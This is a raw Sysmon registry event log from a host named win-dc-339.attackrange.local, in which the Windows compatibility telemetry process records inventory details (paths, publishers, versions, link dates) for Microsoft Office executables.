14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|2c539c4e8f922a27\LowerCaseLongPathc:\program files\microsoft office\root\office16\addins\microsoft power query for excel integrated\bin\microsoft.mashup.container.exe 13241300x800000000000000077323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|237e2a2192600ea3\BinProductVersion2.84.801.0 13241300x800000000000000077322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|237e2a2192600ea3\LinkDate08/18/2020 19:34:20 13241300x800000000000000077321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|237e2a2192600ea3\Publishermicrosoft corporation 13241300x800000000000000077320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|237e2a2192600ea3\LowerCaseLongPathc:\program files\microsoft office\root\office16\addins\microsoft power query for excel integrated\bin\microsoft.mashup.container.loader.exe 13241300x800000000000000077319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lyncicon.exe|cf5ccf14e5b4e8d6\BinProductVersion16.0.13127.21336 13241300x800000000000000077318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lyncicon.exe|cf5ccf14e5b4e8d6\LinkDate03/05/2021 01:56:29 13241300x800000000000000077317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lyncicon.exe|cf5ccf14e5b4e8d6\Publishermicrosoft corporation 13241300x800000000000000077316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lyncicon.exe|cf5ccf14e5b4e8d6\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\lyncicon.exe 13241300x800000000000000077315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lynchtmlconv.exe|963a17d6e811cd33\BinProductVersion16.0.13127.21348 13241300x800000000000000077314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lynchtmlconv.exe|963a17d6e811cd33\LinkDate03/06/2021 23:36:29 13241300x800000000000000077313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lynchtmlconv.exe|963a17d6e811cd33\Publishermicrosoft corporation 13241300x800000000000000077312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lynchtmlconv.exe|963a17d6e811cd33\LowerCaseLongPathc:\program files\microsoft office\root\office16\lynchtmlconv.exe 13241300x800000000000000077311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lync99.exe|11bf44393ed6256a\BinProductVersion16.0.13127.21348 13241300x800000000000000077310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lync99.exe|11bf44393ed6256a\LinkDate03/06/2021 23:36:08 13241300x800000000000000077309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lync99.exe|11bf44393ed6256a\Publishermicrosoft corporation 13241300x800000000000000077308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lync99.exe|11bf44393ed6256a\LowerCaseLongPathc:\program files\microsoft office\root\office16\lync99.exe 13241300x800000000000000077307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lync.exe|2fa06986cf265aad\BinProductVersion16.0.13127.21348 13241300x800000000000000077306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lync.exe|2fa06986cf265aad\LinkDate03/06/2021 23:35:28 13241300x800000000000000077305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lync.exe|2fa06986cf265aad\Publishermicrosoft corporation 13241300x800000000000000077304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\lync.exe|2fa06986cf265aad\LowerCaseLongPathc:\program files\microsoft office\root\office16\lync.exe 13241300x800000000000000077303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\joticon.exe|fbcbe724436d069f\BinProductVersion16.0.13127.21336 13241300x800000000000000077302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\joticon.exe|fbcbe724436d069f\LinkDate03/04/2021 07:49:45 13241300x800000000000000077301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\joticon.exe|fbcbe724436d069f\Publishermicrosoft corporation 13241300x800000000000000077300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\joticon.exe|fbcbe724436d069f\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\joticon.exe 13241300x800000000000000077299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\BinProductVersion16.0.13127.21210 13241300x800000000000000077298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\LinkDate02/05/2021 12:50:14 13241300x800000000000000077297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\Publishermicrosoft corporation 13241300x800000000000000077296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\LowerCaseLongPathc:\program files\microsoft office\root\integration\integrator.exe 13241300x800000000000000077295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\iecontentservice|f42fbf118c5a773\BinProductVersion16.0.13127.21348 13241300x800000000000000077294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\iecontentservice|f42fbf118c5a773\LinkDate03/06/2021 23:34:37 13241300x800000000000000077293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\iecontentservice|f42fbf118c5a773\Publishermicrosoft corporation 13241300x800000000000000077292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\iecontentservice|f42fbf118c5a773\LowerCaseLongPathc:\program files\microsoft office\root\office16\iecontentservice.exe 13241300x800000000000000077291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\grv_icons.exe|d24c93c0e0170bfb\BinProductVersion16.0.13127.21336 13241300x800000000000000077290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\grv_icons.exe|d24c93c0e0170bfb\LinkDate03/04/2021 07:50:19 13241300x800000000000000077289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\grv_icons.exe|d24c93c0e0170bfb\Publishermicrosoft corporation 13241300x800000000000000077288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\grv_icons.exe|d24c93c0e0170bfb\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\grv_icons.exe 13241300x800000000000000077287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\graph.exe|9e2331c7d66bcaeb\BinProductVersion16.0.13127.21348 13241300x800000000000000077286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\graph.exe|9e2331c7d66bcaeb\LinkDate03/06/2021 23:35:24 13241300x800000000000000077285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\graph.exe|9e2331c7d66bcaeb\Publishermicrosoft corporation 13241300x800000000000000077284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\graph.exe|9e2331c7d66bcaeb\LowerCaseLongPathc:\program files\microsoft office\root\office16\graph.exe 13241300x800000000000000077283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\fltldr.exe|3fca25c5b23cb198\BinProductVersion16.0.13127.21210 13241300x800000000000000077282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\fltldr.exe|3fca25c5b23cb198\LinkDate02/05/2021 12:31:18 13241300x800000000000000077281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\fltldr.exe|3fca25c5b23cb198\Publishermicrosoft corporation 13241300x800000000000000077280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\fltldr.exe|3fca25c5b23cb198\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\fltldr.exe 13241300x800000000000000077279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\filecompare.exe|eb3b84e79f3ffde4\BinProductVersion16.0.13127.20144 13241300x800000000000000077278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\filecompare.exe|eb3b84e79f3ffde4\LinkDate08/07/2020 09:18:11 13241300x800000000000000077277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\filecompare.exe|eb3b84e79f3ffde4\Publishermicrosoft corporation 13241300x800000000000000077276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\filecompare.exe|eb3b84e79f3ffde4\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx86\microsoft office\office16\dcf\filecompare.exe 13241300x800000000000000077275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\excelcnv.exe|f227d29286aef5b1\BinProductVersion16.0.13127.21348 13241300x800000000000000077274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\excelcnv.exe|f227d29286aef5b1\LinkDate03/06/2021 23:41:46 13241300x800000000000000077273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\excelcnv.exe|f227d29286aef5b1\Publishermicrosoft corporation 13241300x800000000000000077272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\excelcnv.exe|f227d29286aef5b1\LowerCaseLongPathc:\program files\microsoft office\root\office16\excelcnv.exe 13241300x800000000000000077271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\excel.exe|39225495ceb51fb7\BinProductVersion16.0.13127.21348 13241300x800000000000000077270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\excel.exe|39225495ceb51fb7\LinkDate03/06/2021 23:52:26 13241300x800000000000000077269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\excel.exe|39225495ceb51fb7\Publishermicrosoft corporation 13241300x800000000000000077268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\excel.exe|39225495ceb51fb7\LowerCaseLongPathc:\program files\microsoft office\root\office16\excel.exe 13241300x800000000000000077267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dwtrig20.exe|59e3570877b6a7b6\BinProductVersion16.0.13127.21210 13241300x800000000000000077266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dwtrig20.exe|59e3570877b6a7b6\LinkDate02/05/2021 12:39:51 13241300x800000000000000077265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dwtrig20.exe|59e3570877b6a7b6\Publishermicrosoft corporation 13241300x800000000000000077264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dwtrig20.exe|59e3570877b6a7b6\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\dw\dwtrig20.exe 13241300x800000000000000077263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dw20.exe|12b87ce673fee545\BinProductVersion16.0.13127.21210 13241300x800000000000000077262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dw20.exe|12b87ce673fee545\LinkDate02/05/2021 12:43:50 13241300x800000000000000077261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dw20.exe|12b87ce673fee545\Publishermicrosoft corporation 13241300x800000000000000077260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dw20.exe|12b87ce673fee545\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\dw\dw20.exe 13241300x800000000000000077259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dbcicons.exe|8bf455c5b37991bd\BinProductVersion16.0.13127.21336 13241300x800000000000000077258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dbcicons.exe|8bf455c5b37991bd\LinkDate03/04/2021 07:51:19 13241300x800000000000000077257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dbcicons.exe|8bf455c5b37991bd\Publishermicrosoft corporation 13241300x800000000000000077256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\dbcicons.exe|8bf455c5b37991bd\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\dbcicons.exe 13241300x800000000000000077255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.717{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\databasecompare.|d0717b3f5b185152\BinProductVersion16.0.11929.20112 